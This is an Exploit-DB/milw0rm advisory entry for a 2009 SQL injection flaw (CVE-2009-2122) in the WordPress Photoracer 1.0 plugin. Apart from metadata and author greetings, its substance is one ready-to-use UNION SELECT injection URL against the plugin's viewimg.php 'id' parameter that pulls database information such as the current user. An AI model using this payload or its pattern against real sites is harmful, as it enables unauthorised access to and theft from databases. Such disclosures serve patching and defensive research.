WordPress Plugin Photoracer 1.0 - id SQL Injection Vulnerability

2009-06-15T00:00:00
ID EDB-ID:8961
Type exploitdb
Reporter Kacper
Modified 2009-06-15T00:00:00

Description

WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability. CVE-2009-2122. Webapps exploit for php platform

                                        
                                            Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/ 

Author: Kacper
Website: http://devilteam.pl/

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 

Pozdro: Ratman, Kopaczka, FDJ

Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

Vuln:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

big thanks str0ke for you!

be safe all :)

# milw0rm.com [2009-06-15]